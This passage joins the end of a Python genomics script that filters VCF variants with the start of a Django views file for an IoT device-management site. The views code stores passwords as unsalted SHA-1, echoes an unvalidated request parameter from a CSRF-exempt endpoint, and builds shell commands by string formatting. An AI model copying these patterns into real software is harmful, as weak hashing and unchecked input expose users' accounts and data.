                if vaf > float(cfg['SMuRF']['absent_threshold']) and call.sample not in args.normal:
                    record_vaf[call.sample] = vaf
                # Update the format field for this sample
                ft = call['FT']
                if float(dv+dr) < int(cfg['SMuRF']['coverage']):
                    ft = 'LowCov'
                    qc[sample][call.sample] = 'LowCov'
                else:
                    qc[sample][call.sample] = call['FT']
                update_call_data(call, ['VAF','CAD','FT'], [vaf, [dr, dv], ft], vcf_reader)
                # Set absent, subclonal or clonal based on the VAF and threshold
                if vaf <= float(cfg['SMuRF']['absent_threshold']):
                    vaf_info[sample]['ABSENT'].append(call.sample)
                elif vaf < float(cfg['SMuRF']['clonal_threshold']):
                    vaf_info[sample]['SUBCLONAL'].append(call.sample)
                else:
                    vaf_info[sample]['CLONAL'].append(call.sample)
    # Keep GT first in the FORMAT column
    format_list = list(vcf_reader.formats.keys())
    format_list.remove('GT')
    format_list.insert(0,'GT')
    # Add VAF information to the format field of each sample
    record.FORMAT = ":".join(format_list)
    # NOTE(review): 'sample' and 'dx' here carry the values from the LAST
    # iteration of the loops above — confirm this is the intended check.
    if not sample and dx > 0:
        record.FILTER.append('OverlappingIndelInControl')
    # Add QC information to the INFO field
    if len(qc[False].keys()) > 0 and list(qc[False].values()).count('PASS') == 0:
        record.FILTER.append('AllControlsFailedQC')
        check = False
    elif list(qc[True].values()).count('PASS') == 0:
        record.FILTER.append('AllSamplesFailedQC')
        check = False
    else:
        record.INFO['PASS_QC_SAMPLES'] = list(qc[True].values()).count('PASS')
        record.INFO['FAIL_QC_SAMPLES'] = len(qc[True])-list(qc[True].values()).count('PASS')
        record.INFO['PASS_QC_SAMPLE_NAMES'] = list(np.array(list(qc[True].keys()))[list(np.where(np.array(list(qc[True].values())) == 'PASS')[0])])
        record.INFO['FAIL_QC_SAMPLE_NAMES'] = list(np.array(list(qc[True].keys()))[list(np.where(np.array(list(qc[True].values())) != 'PASS')[0])])
        if ( len(qc[False].keys()) > 0 ):
            record.INFO['PASS_QC_CONTROLS'] = list(qc[False].values()).count('PASS')
            record.INFO['FAIL_QC_CONTROLS'] = len(qc[False])- list(qc[False].values()).count('PASS')
            record.INFO['PASS_QC_CONTROL_NAMES'] = list(np.array(list(qc[False].keys()))[list(np.where(np.array(list(qc[False].values())) == 'PASS')[0])])
            record.INFO['FAIL_QC_CONTROL_NAMES'] = list(np.array(list(qc[False].keys()))[list(np.where(np.array(list(qc[False].values())) != 'PASS')[0])])
    # Add clonal information to the INFO field
    record.INFO['ABSENT_SAMPLES'] = len(vaf_info[True]['ABSENT'])
    record.INFO['SUBCLONAL_SAMPLES'] = len(vaf_info[True]['SUBCLONAL'])
    record.INFO['CLONAL_SAMPLES'] = len(vaf_info[True]['CLONAL'])
    record.INFO['ABSENT_CONTROLS'] = len(vaf_info[False]['ABSENT'])
    record.INFO['SUBCLONAL_CONTROLS'] = len(vaf_info[False]['SUBCLONAL'])
    record.INFO['CLONAL_CONTROLS'] = len(vaf_info[False]['CLONAL'])
    record.INFO['ABSENT_SAMPLE_NAMES'] = vaf_info[True]['ABSENT']
    record.INFO['SUBCLONAL_SAMPLE_NAMES'] = vaf_info[True]['SUBCLONAL']
    record.INFO['CLONAL_SAMPLE_NAMES'] = vaf_info[True]['CLONAL']
    record.INFO['ABSENT_CONTROL_NAMES'] = vaf_info[False]['ABSENT']
    record.INFO['SUBCLONAL_CONTROL_NAMES'] = vaf_info[False]['SUBCLONAL']
    record.INFO['CLONAL_CONTROL_NAMES'] = vaf_info[False]['CLONAL']
    # Flag variant if it is found subclonal in a control
    if len(vaf_info[False]['SUBCLONAL']) > 0:
        record.FILTER.append('ControlSubclonal')
    # Flag variant if it is found clonal in a control
    elif len(vaf_info[False]['CLONAL']) > 0:
        record.FILTER.append('ControlClonal')
    # Flag variant if it is not found clonal in one of the samples
    elif len(vaf_info[True]['CLONAL']) == 0:
        record.FILTER.append('NoClonalSample')
    return( record_vaf )
def create_blacklist():
    """
    Function to fill the blacklist dictionary.

    Reads every blacklist file listed (comma-separated) in
    cfg['SMuRF']['blacklist'], converts BED positions to 1-based, and
    normalizes chromosome names to bare lower-case (strips a leading
    'chr'/'chrom' prefix).

    Return: dict mapping chromosome name -> list of blacklisted positions
    """
    blacklists = []
    # Loop through every blacklist file given in the config
    for bl_vcf in cfg['SMuRF']['blacklist'].split(","):
        blacklist_single = pd.read_csv(bl_vcf,
                                       sep="\t",
                                       comment="#",
                                       header=None,
                                       names=["chr", "loc"],
                                       usecols=["chr", "loc"],
                                       dtype={0: "str", 1: "int"})
        if bl_vcf.endswith(".bed"):
            blacklist_single["loc"] += 1  # Bed files are 0-based and are converted to 1-based.
        elif not bl_vcf.endswith(".vcf"):
            warnings.warn("""The blacklist: {0} is not a .vcf or .bed file. Continuing with the following assumptions:\n
            Column 1: Chromosome\n
            Column 2: 1-based position\n
            Header/Comments: #""".format(bl_vcf))
        blacklists.append(blacklist_single)
    blacklist = pd.concat(blacklists)
    # BUGFIX: the alternation must try the longer prefix first — with
    # "chr|chrom" the "chr" branch always wins, so "chrom1" became "om1".
    # regex=True is explicit because the pandas default changed to False.
    blacklist["chr"] = blacklist["chr"].str.lower().str.replace("chrom|chr", "", regex=True)
    # Group positions per chromosome
    blacklist = {k: g["loc"].tolist() for k, g in blacklist.groupby("chr")}
    return( blacklist )
def merge_tmp_vcfs():
    """
    Function to merge all the tmp contig vcf files.

    Concatenates SMuRF_tmp/<contig>_SMuRF.vcf files into <vcf_name>_SMuRF.vcf
    (keeping only the first file's header), then writes the header plus all
    PASS records to SMuRF_tmp/filter.vcf for downstream annotation.
    """
    # NOTE(review): 'start' is assigned but never used
    start = time.time()
    header = False
    # Loop through all chromomsomes
    for contig in contig_list:
        if not header:
            # First contig: copy whole file including the VCF header
            os.system('cat SMuRF_tmp/{}_SMuRF.vcf > {}_SMuRF.vcf'.format(contig, vcf_name))
            header = True
        else:
            # Later contigs: append records only, skip header lines
            os.system('grep -v \'^#\' SMuRF_tmp/{}_SMuRF.vcf >> {}_SMuRF.vcf'.format(contig, vcf_name))
    # Keep the header and PASS records for the filtered output
    os.system("grep -P '^#|\s+PASS\s+' "+vcf_name+"_SMuRF.vcf > SMuRF_tmp/filter.vcf")
def add_responsibilities():
    """
    Annotate the filtered VCF with the GMM component probabilities.

    Reads SMuRF_tmp/filter.vcf, declares a per-sample 'PC' FORMAT field,
    looks up each call's responsibilities in the global
    responsibilities_dict (keyed by sample and VAF rounded to 2 decimals,
    as stored by create_vaf_plot), writes <vcf_name>_SMuRF_filtered.vcf
    and finally removes the SMuRF_tmp working directory.
    """
    vcf_reader = pyvcf.Reader(filename="SMuRF_tmp/filter.vcf", encoding='utf-8')
    # Declare the new per-sample FORMAT field in the header
    vcf_reader.formats['PC'] = pyvcf.parser._Format('PC',None,'Float','Probability of each component')
    vcf_writer = pyvcf.Writer(open(vcf_name+'_SMuRF_filtered.vcf','w', encoding='utf-8'), vcf_reader)
    for record in vcf_reader:
        for call in (record.samples):
            vaf = call['VAF']
            sample = call.sample
            if vaf != None and vaf > 0.0:
                # Responsibilities were cached keyed by the 2-decimal VAF string
                vaf = '{0:.2f}'.format(vaf)
                update_call_data(call, ['PC'], [responsibilities_dict[sample][str(vaf)]], vcf_reader)
            else:
                update_call_data(call, ['PC'], [None], vcf_reader)
        # Keep GT first in the FORMAT column
        format_list = list(vcf_reader.formats.keys())
        format_list.remove('GT')
        format_list.insert(0,'GT')
        # Add VAF information to the format field of each sample
        record.FORMAT = ":".join(format_list)
        vcf_writer.write_record(record)
    # os.system("rm -rf SMuRF_tmp/*")
    # Give the writer a moment to flush, then drop the temp directory
    time.sleep(5)
    os.system("rm -rf SMuRF_tmp")
# Script entry point: run the SMuRF pipeline stages in order.
if __name__ == "__main__":
    #get_command_line()
    main()
    # Fit GMMs per sample and fill responsibilities_dict (used below)
    create_vaf_plot()
    # Concatenate per-contig VCFs and create SMuRF_tmp/filter.vcf
    merge_tmp_vcfs()
    # Annotate filter.vcf with GMM probabilities and clean up SMuRF_tmp
    add_responsibilities()
|
views.py | from django.shortcuts import render, HttpResponse, redirect
from SqlMaster.models import *
import hashlib
import datetime
import random
from django.views.decorators.csrf import csrf_exempt
import json
from threading import Thread
from queue import Queue
from django.db.models import F, Q
# Generate a device registration code
def createCode():
    """Return a random 15-character registration code.

    Characters are drawn without replacement from a fixed alphabet of
    lower/upper-case letters and digits (some confusable upper-case
    letters are deliberately absent from the alphabet).
    """
    alphabet = ('abcdefghijkmlnopqrstuvwxyz'
                'ABCDEFGHIJKLMN'
                'UVWXYZ'
                '0123456789')
    return ''.join(random.sample(alphabet, 15))
# Warning-status helper ("waring" is this codebase's spelling of "warning")
def waringDevice(user_obj):
    """Collect the systems and devices of *user_obj* that have warning data.

    A device counts as "warning" when it has at least one Data row with
    waring=1. Returns (systems, warning_devices), paired per device.

    NOTE(review): this function is re-defined later in this module with a
    nearly identical body; the later definition shadows this one at import
    time, so this copy is effectively dead code.
    """
    devices = []
    system = []
    waring_devices = []
    # Gather every device of every system visible to the user
    for system_obj in user_obj.system.all():
        for device_obj in system_obj.device.all():
            devices.append(device_obj)
    for device_obj in devices:
        if device_obj.data.filter(waring=1).all():
            system.append(device_obj.system)
            waring_devices.append(device_obj)
    return system, waring_devices
# Create your views here.
def home_no(request):
    """Handle /home with no username.

    Logged-in sessions are redirected to their personal home page;
    anonymous visitors get the login page.
    """
    if not request.session.get('IS_LOGIN', False):
        return render(request, 'waring_login.html')
    return redirect('/home/' + request.session.get('USERNAME'))
# Endpoint for testing OneNET HTTP push (originally set up for huyunjiang)
@csrf_exempt
def onenet(request):
    """Receive OneNET HTTP push messages.

    GET: echo the 'msg' query parameter (OneNET URL verification).
    POST: parse the JSON body, look up the device by IMEI and store the
    payload as a Data row (waring=1 when the payload reports Full == 1).
    Always answers "123" on POST so the push is acknowledged.
    """
    if request.method == 'GET':
        return HttpResponse(request.GET['msg'])
    else:
        from ast import literal_eval
        msg = json.loads(request.body)['msg']
        imei = msg['imei']
        # SECURITY FIX: this payload comes from an external HTTP request and
        # was previously parsed with eval(), which executes arbitrary code.
        # literal_eval parses the same Python-literal dicts but rejects any
        # executable expression.
        data = literal_eval(msg['value'])
        print(msg, imei, data, data['Lat'])
        if Device.objects.filter(IMEI=imei):
            device_obj = Device.objects.filter(IMEI=imei)[0]
            if data['Full'] == 1:
                Data.objects.create(device=device_obj, model=0, data=msg['value'], waring=1)
                return HttpResponse("123")
            else:
                Data.objects.create(device=device_obj, model=0, data=msg['value'])
                return HttpResponse("123")
        else:
            return HttpResponse("123")
def admin_no(request):
    """Handle /admin with no username.

    Logged-in sessions are redirected to their personal admin page;
    anonymous visitors get the login page.
    """
    if not request.session.get('IS_LOGIN', False):
        return render(request, 'waring_login.html')
    return redirect('/admin/' + request.session.get('USERNAME'))
def mainAdmin(request, username):
    """Platform-overview page for the admin area.

    Verifies login and that the session user matches *username*, then
    assembles counts (devices, systems, today's push/pull data) plus
    per-platform pie/bar chart dicts and renders admin.html with locals().
    NOTE: every local name here is exposed to the template via locals() —
    renaming locals changes template behavior.
    """
    is_login = request.session.get('IS_LOGIN', False)
    if is_login:
        if request.session.get('USERNAME') == username:
            # Check this is the session's own user; fetch the Users ORM object
            user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
            # Any devices in warning state?
            waring_system_list, waring_device_list = waringDevice(user_obj)
            user_name = user_obj.name
            first_name = user_name[0]
            # Header selection marker
            plat_admin_chose = 'active'
            # Menu selection marker
            main_admin = 'active'
            # Title shown in the main panel ("platform overview")
            exhibition_name = '平台概况'
            # All devices the user can see
            devices = []
            for system_obj in user_obj.system.all():
                for device_obj in system_obj.device.all():
                    devices.append(device_obj)
            device_count = len(devices)
            # Systems administered by this user
            system_list = System.objects.filter(admin=user_obj)
            system_count = system_list.count()
            # Today's date as 'YYYY-MM-DD'
            now_date = str(datetime.datetime.now().date())
            # Today's pushed (model truthy) vs pulled data rows
            today_push_data = []
            today_pull_data = []
            for device_obj in devices:
                for data_obj in device_obj.data.all():
                    if str(data_obj.date).split()[0] == now_date:
                        if data_obj.model:
                            today_push_data.append(data_obj)
                        else:
                            today_pull_data.append(data_obj)
            today_push_data_count = len(today_push_data)
            today_pull_data_count = len(today_pull_data)
            # Pie chart: number of systems per platform type
            system_type_dict = {'Jinger': 0, 'Detritus': 0, 'Lumiere': 0, 'Parquer': 0, 'Others': 0, }
            for system_obj in system_list:
                system_type_dict[str(system_obj.platform)] = system_type_dict[str(system_obj.platform)] + 1
            # Bar chart: number of devices per platform type
            device_count_dict = {'Jinger': 0, 'Detritus': 0, 'Lumiere': 0, 'Parquer': 0, 'Others': 0, }
            for system_obj in system_list:
                device_count_dict[str(system_obj.platform)] = device_count_dict[str(system_obj.platform)] + len(
                    system_obj.device.all())
            return render(request, 'admin.html', locals())
        else:
            return redirect('/admin/' + request.session.get('USERNAME'))
    else:
        return redirect('/')
def deviceAdmin(request, username):
    """Device-management page for the admin area.

    Verifies login/identity, then computes total, active-today and warning
    device counts and renders deviceAdmin.html with locals().
    NOTE: locals() is passed to the template — local names are part of the
    template contract.
    """
    is_login = request.session.get('IS_LOGIN', False)
    if is_login:
        if request.session.get('USERNAME') == username:
            # Fetch the Users ORM object for the session user
            user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
            # Any devices in warning state?
            waring_system_list, waring_device_list = waringDevice(user_obj)
            user_name = user_obj.name
            first_name = user_name[0]
            # Header selection marker
            plat_admin_chose = 'active'
            # Menu selection marker
            device_admin = 'active'
            # Title shown in the main panel ("device management")
            exhibition_name = '设备管理'
            # Systems administered by this user
            system_list = System.objects.filter(admin=user_obj)
            # All devices visible to the user
            devices = []
            for system_obj in user_obj.system.all():
                for device_obj in system_obj.device.all():
                    devices.append(device_obj)
            device_count = len(devices)
            now_date = str(datetime.datetime.now().date())
            # Devices whose latest data row is from today
            device_active_count = 0
            for device_obj in devices:
                if device_obj.data.all():
                    if str(device_obj.data.last().date).split()[0] == now_date:
                        device_active_count = device_active_count + 1
            # Devices with at least one warning data row
            device_waring_count = 0
            for device_obj in devices:
                if device_obj.data.filter(waring=1).all():
                    device_waring_count = device_waring_count + 1
            return render(request, 'deviceAdmin.html', locals())
        else:
            return redirect('/admin/' + request.session.get('USERNAME') + '/device')
    else:
        return redirect('/')
def deviceRemove(request, username):
    """POST endpoint: delete a device by id ('did').

    Allowed when the user both created the device's system and is among its
    admins, or when the user has no parent (user_obj.rely is falsy, i.e. a
    top-level admin). Responds '666' on success, '555' when not permitted.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Session user matches the URL user
                did = request.POST.get('did')
                user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
                # Device ORM object
                device_obj = Device.objects.filter(id=did)[0]
                # Permission check: (creator AND admin) OR top-level user
                if (
                        device_obj.system.createuser == user_obj and user_obj in device_obj.system.admin.all()) or not user_obj.rely:
                    # Delete the device and record the operation
                    device_obj.delete()
                    Operation.objects.create(
                        code=303,
                        user=user_obj)
                    return HttpResponse('666')
                else:
                    # Device is not managed by this user
                    return HttpResponse('555')
            else:
                return redirect('/admin/' + request.session.get('USERNAME') + '/device/')
        else:
            return redirect('/')
    else:
        return redirect('/')
def systemCreate(request, username):
    """POST endpoint: create a system and grant admin rights up the
    user-hierarchy chain.

    Responses: '666' created, '444' name already exists in the domain,
    '222' the 'type' template is not the expected format.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Session user matches the URL user
                user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
                # Read the POSTed system attributes
                name = request.POST.get('name')
                platform = request.POST.get('platform')
                type = request.POST.get('type')
                protocol = request.POST.get('protocol')
                code = createCode()
                # The 'type' template must start with the fixed field prefix
                if str(type).startswith('{\'Lon\':\'经度\',\'Lat\':\'纬度\',\'Switch\':\'设备状态\',\'Cycle\':\'订阅周期\','):
                    if System.objects.filter(domain_id=request.session.get('DOMAIN_ID'), name=name):
                        return HttpResponse('444')
                    else:
                        # Create the system
                        System.objects.create(name=name, platform=platform, type=type, protocol=protocol,
                                              domain_id=request.session.get('DOMAIN_ID'), createuser=user_obj,
                                              devicecode=code)
                        # Grant admin rights to the creator and every ancestor
                        # by walking the 'rely' (parent user) chain upwards
                        admin_user = user_obj
                        while True:
                            if admin_user.rely:
                                System.objects.filter(name=name, domain_id=request.session.get('DOMAIN_ID'))[
                                    0].admin.add(admin_user, admin_user.rely)
                                admin_user = admin_user.rely
                            else:
                                System.objects.filter(name=name, domain_id=request.session.get('DOMAIN_ID'))[
                                    0].admin.add(admin_user)
                                break
                        # Record the operation
                        Operation.objects.create(code=202, user=user_obj)
                        return HttpResponse('666')
                else:
                    return HttpResponse('222')
            else:
                return redirect('/admin/' + request.session.get('USERNAME'))
        else:
            return redirect('/')
    else:
        return redirect('/')
def systemRemove(request, username):
    """POST endpoint: delete a system by id ('sid').

    Allowed when the user both created the system and is among its admins,
    or when the user has no parent (top-level admin). Clears the admin M2M
    before deleting. Responds '666' on success, '555' when not permitted.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Session user matches the URL user
                sid = request.POST.get('sid')
                # User ORM object
                user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
                # System ORM object
                sys_obj = System.objects.filter(id=sid)[0]
                # Permission check: (creator AND admin) OR top-level user
                if (sys_obj.createuser == user_obj and user_obj in sys_obj.admin.all()) or not user_obj.rely:
                    # Detach admins, delete the system, record the operation
                    sys_obj.admin.clear()
                    sys_obj.delete()
                    Operation.objects.create(
                        code=203, user=user_obj)
                    return HttpResponse('666')
                else:
                    return HttpResponse('555')
            else:
                return redirect('/admin/' + request.session.get('USERNAME'))
        else:
            return redirect('/')
    else:
        return redirect('/')
def deviceAdd(request, username):
    """POST endpoint: add a device (name, IMEI) to a system ('sid').

    Responds '666' on success, '444' when the system already has a device
    with that name.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Session user matches the URL user
                user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
                # Read the POSTed device attributes
                name = request.POST.get('name')
                sid = request.POST.get('sid')
                IMEI = request.POST.get('IMEI')
                if Device.objects.filter(system_id=sid, name=name):
                    # Duplicate device name within the system
                    return HttpResponse('444')
                else:
                    Device.objects.create(name=name, IMEI=IMEI, system_id=sid)
                    # Record the operation
                    Operation.objects.create(code=302, user=user_obj)
                    return HttpResponse('666')
            else:
                return redirect('/admin/' + request.session.get('USERNAME') + '/device/')
        else:
            return redirect('/')
    else:
        return redirect('/')
def mainHome(request, username):
    """User-management home page.

    Determines the user's level by walking the 'rely' parent chain, counts
    direct sub-users and systems, and renders home.html with locals().
    NOTE: locals() is passed to the template — local names are part of the
    template contract.
    """
    is_login = request.session.get('IS_LOGIN', False)
    if is_login:
        if request.session.get('USERNAME') == username:
            # Session user matches the URL user
            user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
            # Any devices in warning state?
            waring_system_list, waring_device_list = waringDevice(user_obj)
            domain = Domain.objects.filter(
                id=request.session.get('DOMAIN_ID'))[0]
            domain_name = domain.name
            user_name = user_obj.name
            first_name = user_name[0]
            # Header selection marker
            user_center_chose = 'active'
            # Menu selection marker
            main_home = 'active'
            # Title shown in the main panel ("user management")
            exhibition_name = '用户管理'
            user_leve = 1
            # Level number -> display label ("admin user", "level-2 user", …)
            dic_user = {
                1: '管理员用户',
                2: '二级用户',
                3: '三级用户',
                4: '四级用户',
                5: '五级用户',
                6: '六级用户',
            }
            # Walk up the parent chain to find this user's depth/level
            sub_user = user_obj
            while True:
                if sub_user.rely_id:
                    sub_user = sub_user.rely
                    user_leve = user_leve + 1
                else:
                    user_class = dic_user.get(user_leve)
                    break
            # Direct sub-users
            sub_user = Users.objects.filter(rely_id=user_obj.id)
            sub_user_count = sub_user.count()
            system_count = user_obj.system.count()
            return render(request, 'home.html', locals())
        else:
            return redirect('/home/' + request.session.get('USERNAME'))
    else:
        return redirect('/')
def authHome(request, username):
    """Permission-settings page.

    Lists the systems the user administers and the user's direct sub-users,
    then renders authHome.html with locals().
    NOTE: locals() is passed to the template — local names are part of the
    template contract.
    """
    is_login = request.session.get('IS_LOGIN', False)
    if is_login:
        if request.session.get('USERNAME') == username:
            # Session user matches the URL user
            user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
            # Any devices in warning state?
            waring_system_list, waring_device_list = waringDevice(user_obj)
            user_name = user_obj.name
            first_name = user_name[0]
            # Header selection marker
            user_center_chose = 'active'
            # Menu selection marker
            auth_home = 'active'
            # Title shown in the main panel ("permission settings")
            exhibition_name = '权限设置'
            # Systems administered by this user
            system_list = System.objects.filter(admin=user_obj)
            system_count = system_list.count()
            # Direct sub-users
            sub_user = Users.objects.filter(rely=user_obj)
            return render(request, 'authHome.html', locals())
        else:
            return redirect('/home/' + request.session.get('USERNAME') + '/auth')
    else:
        return redirect('/')
def centerHome(request, username):
    """Personal-center page.

    Verifies login/identity and renders centerHome.html with locals().
    NOTE: locals() is passed to the template — local names are part of the
    template contract.
    """
    is_login = request.session.get('IS_LOGIN', False)
    if is_login:
        if request.session.get('USERNAME') == username:
            # Session user matches the URL user
            user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
            # Any devices in warning state?
            waring_system_list, waring_device_list = waringDevice(user_obj)
            user_name = user_obj.name
            first_name = user_name[0]
            # Header selection marker
            user_center_chose = 'active'
            # Menu selection marker
            center_home = 'active'
            # Title shown in the main panel ("personal center")
            exhibition_name = '个人中心'
            return render(request, 'centerHome.html', locals())
        else:
            return redirect('/home/' + request.session.get('USERNAME') + '/center')
    else:
        return redirect('/')
def domainChange(request, username):
    """POST endpoint: edit the domain's name/country/province/city.

    Only top-level users (user_obj.rely falsy) may edit; others get '222'.
    Responds '666' on success.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Session user matches the URL user
                user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
                domain = Domain.objects.filter(
                    id=request.session.get('DOMAIN_ID'))[0]
                # Only admin (top-level, no parent) users may change the domain
                if user_obj.rely:
                    return HttpResponse('222')
                else:
                    # Apply the POSTed domain fields
                    reg_domain = request.POST.get('domain')
                    reg_country = request.POST.get('country')
                    reg_province = request.POST.get('province')
                    reg_city = request.POST.get('city')
                    domain.name = reg_domain
                    domain.country = reg_country
                    domain.province = reg_province
                    domain.city = reg_city
                    domain.save()
                    # Record the operation
                    Operation.objects.create(code=100, user=user_obj)
                    return HttpResponse('666')
            else:
                return redirect('/home/' + request.session.get('USERNAME') + '/center')
        else:
            return redirect('/')
    else:
        # NOTE(review): other views redirect to '/' here; this one uses
        # '/home' — confirm whether that difference is intended
        return redirect('/home')
def userAdd(request, username):
    """POST endpoint: create a sub-user under the current user.

    Responses: '666' created, '444' username exists in the domain,
    '777' phone number exists, '888' email exists. The password is stored
    as a SHA-1 hex digest (matching the login/passwordChange views).
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Read the POSTed user attributes
                reg_username = request.POST.get('username')
                reg_name = request.POST.get('name')
                reg_pwd = request.POST.get('password')
                reg_tel = request.POST.get('tel')
                reg_email = request.POST.get('email')
                # Current user (the new user's parent)
                user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
                # Owning domain
                domain = Domain.objects.filter(
                    id=request.session.get('DOMAIN_ID'))[0]
                new_user = Users.objects.filter(username=reg_username, domain_id=request.session.get('DOMAIN_ID'))
                if new_user:
                    # Username already taken in this domain
                    return HttpResponse('444')
                else:
                    new_user = Users.objects.filter(phone=reg_tel)
                    if new_user:
                        # Phone number already registered
                        return HttpResponse('777')
                    else:
                        new_user = Users.objects.filter(email=reg_email)
                        if new_user:
                            # Email already registered
                            return HttpResponse('888')
                        else:
                            # Hash the password (SHA-1 hex digest)
                            password = hashlib.sha1(
                                reg_pwd.encode(encoding='utf8')).hexdigest()
                            # Create the sub-user, linked via 'rely'
                            Users.objects.create(username=reg_username, password=password, name=reg_name,
                                                 domain=domain, rely=user_obj,
                                                 phone=reg_tel, email=reg_email)
                            # Record the operation
                            Operation.objects.create(code=101, user=user_obj)
                            return HttpResponse('666')
            else:
                return redirect('/home/' + request.session.get('USERNAME') + '/center')
        else:
            return redirect('/')
    else:
        return redirect('/')
def userRemove(request, username):
    """POST endpoint: delete a direct sub-user by id.

    The queryset filter requires the target to 'rely' on the current user,
    so only direct children can be removed. Responds '666' on success,
    '555' when the target is not managed by this user.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Session user matches the URL user
                sub_id = request.POST.get('id')
                # Sub-user queryset (empty unless it is a direct child)
                sub_obj = Users.objects.filter(
                    id=sub_id,
                    rely=Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
                if sub_obj:
                    # Delete the sub-user and record the operation
                    sub_obj.delete()
                    Operation.objects.create(
                        code=102,
                        user=Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
                    return HttpResponse('666')
                else:
                    # Target user is not managed by this user
                    return HttpResponse('555')
            else:
                return redirect('/home/' + request.session.get('USERNAME'))
        else:
            return redirect('/')
    else:
        return redirect('/')
def adminRemove(request, username):
    """POST endpoint: revoke a sub-user's admin rights on a system.

    Removes system 'sid' from the sub-user's system M2M; only direct
    children ('rely' = current user) can be targeted. Responds '666' on
    success, '555' otherwise.
    NOTE(review): logs Operation code=205 — the same code adminAdd uses;
    confirm whether removal should have its own code.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Read the POSTed ids
                sub_id = request.POST.get('uid')
                sys_id = request.POST.get('sid')
                # Sub-user queryset (empty unless it is a direct child)
                sub_obj = Users.objects.filter(
                    id=sub_id,
                    rely=Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
                if sub_obj:
                    # Revoke the admin right and record the operation
                    sub_obj[0].system.remove(sys_id)
                    Operation.objects.create(code=205, user=
                    Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
                    return HttpResponse('666')
                else:
                    return HttpResponse('555')
            else:
                return redirect('/home/' + request.session.get('USERNAME'))
        else:
            return redirect('/')
    else:
        return redirect('/')
def adminAdd(request, username):
    """POST endpoint: grant a sub-user admin rights on a system.

    The system queryset requires the current user to already be an admin of
    'system_id'. Responds '666' on success, '444' when the sub-user already
    has the right, '555' when the current user lacks it.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Read the POSTed ids
                sub_id = request.POST.get('sub_id')
                sys_id = request.POST.get('system_id')
                # System queryset (empty unless the current user administers it)
                sys_obj = System.objects.filter(
                    id=sys_id,
                    admin=Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
                if sys_obj:
                    # Already an admin?
                    if sys_obj[0].admin.filter(id=sub_id):
                        return HttpResponse('444')
                    else:
                        # Grant the admin right
                        sys_obj[0].admin.add(sub_id)
                        # Record the operation
                        Operation.objects.create(code=205, user=
                        Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0])
                        return HttpResponse('666')
                else:
                    return HttpResponse('555')
            else:
                return redirect('/home/' + request.session.get('USERNAME'))
        else:
            return redirect('/')
    else:
        return redirect('/')
def userChange(request, username):
    """POST endpoint: update the current user's profile.

    Checks name, then email, then phone against the stored values and
    updates the FIRST field that differs (plus sex/age when nothing else
    differs). Responses: '666' updated, '777' phone already registered to
    another account, '888' email already registered.
    NOTE(review): because only the first differing field is written, a
    request that changes e.g. both name and email persists only the name —
    confirm whether that is intended.
    """
    if request.method == 'POST':
        is_login = request.session.get('IS_LOGIN', False)
        if is_login:
            if request.session.get('USERNAME') == username:
                # Read the POSTed profile fields
                reg_name = request.POST.get('name')
                reg_phone = request.POST.get('phone')
                reg_email = request.POST.get('email')
                reg_age = request.POST.get('age')
                reg_sex = request.POST.get('sex')
                # Current user ORM object
                user_obj = Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID'))[0]
                # Name unchanged?
                if reg_name == user_obj.name:
                    # Email unchanged?
                    if reg_email == user_obj.email:
                        # Phone unchanged?
                        if reg_phone == user_obj.phone:
                            if not reg_age:
                                reg_age = 0
                            # Only sex/age changed — update them
                            Users.objects.filter(username=username, domain_id=request.session.get('DOMAIN_ID')).update(
                                sex=reg_sex, age=reg_age)
                            # Record the operation
                            Operation.objects.create(code=103, user=user_obj)
                            return HttpResponse('666')
                        else:
                            user_exist = Users.objects.filter(phone=reg_phone)
                            if user_exist:
                                # Phone number already registered
                                return HttpResponse('777')
                            else:
                                user_obj.phone = reg_phone
                                user_obj.save()
                                Operation.objects.create(code=103, user=user_obj)
                                return HttpResponse('666')
                    else:
                        user_exist = Users.objects.filter(email=reg_email)
                        if user_exist:
                            # Email already registered
                            return HttpResponse('888')
                        else:
                            user_obj.email = reg_email
                            user_obj.save()
                            Operation.objects.create(code=103, user=user_obj)
                            return HttpResponse('666')
                else:
                    user_obj.name = reg_name
                    user_obj.save()
